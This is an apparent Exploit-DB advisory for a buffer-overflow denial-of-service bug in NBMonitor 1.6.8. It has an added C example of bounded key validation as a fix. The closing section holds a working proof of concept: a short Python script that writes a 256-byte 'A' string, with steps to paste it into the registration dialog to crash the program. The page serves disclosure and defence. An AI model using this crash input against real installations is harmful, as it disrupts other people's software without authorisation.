Vendor: NBMonitor
By: Erick Galindo
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 119
Product Name: NBMonitor
Affected Version From: 1.6.8
Affected Version To: 1.6.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:nsauditor:nbmonitor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2021

NBMonitor 1.6.8 – Denial of Service (PoC)

A denial of service vulnerability exists in NBMonitor 1.6.8. When a crafted string of 256 A's is copied to the clipboard and pasted into the 'Key' field of the registration dialog, a buffer overflow occurs and the application crashes.

Mitigation:

Upgrade to the latest version of NBMonitor.
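
On the developer side, this class of bug (CWE-119 triggered by an over-long pasted key) is closed by bounding the copy and rejecting input that does not fit. The C code below is an added example, not NBMonitor's code and not part of the original advisory; `read_key_field`, `KEY_MAX` and the allowed key alphabet are assumptions, because the page does not describe the application's internals.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define KEY_MAX 64  /* hypothetical buffer size; the real one is not on the page */

typedef enum { KEY_OK = 0, KEY_NULL, KEY_EMPTY, KEY_TOO_LONG, KEY_BAD_CHAR } key_status;

/* Unsafe pattern (CWE-119), for contrast only:
 *     char key[KEY_MAX];
 *     strcpy(key, field_text);    no bound, so a 256-byte paste overruns key[]
 */

/* Copy untrusted field text into a fixed buffer only if it fits and uses
 * the assumed key alphabet (alphanumerics and '-'). */
key_status read_key_field(const char *field_text, char *out, size_t out_size)
{
    if (field_text == NULL || out == NULL || out_size == 0)
        return KEY_NULL;
    out[0] = '\0';              /* output is always a valid string */

    size_t len = 0;             /* bounded probe: reads at most out_size bytes */
    while (len < out_size && field_text[len] != '\0')
        len++;
    if (len == 0)
        return KEY_EMPTY;
    if (len >= out_size)        /* no room left for the terminator */
        return KEY_TOO_LONG;

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)field_text[i];
        if (!isalnum(c) && c != '-')
            return KEY_BAD_CHAR;
    }
    memcpy(out, field_text, len);
    out[len] = '\0';
    return KEY_OK;
}

int main(void)
{
    char big[257], key[KEY_MAX];
    memset(big, 'A', 256);      /* constructed input, same shape as the PoC string */
    big[256] = '\0';
    printf("256-byte paste -> status %d\n", read_key_field(big, key, sizeof key));
    return 0;
}
```

Rejecting the input outright, rather than silently truncating it, also keeps a malformed key from being treated as a valid shorter one.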

Exploit-DB raw data:

# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo 
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok

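# Build the 256-byte string of 'A' (0x41) referred to in step 1
buffer = "\x41" * 256

# Write it to NBM.txt; the with-block closes the file automatically
with open("NBM.txt", "w") as f:
    f.write(buffer)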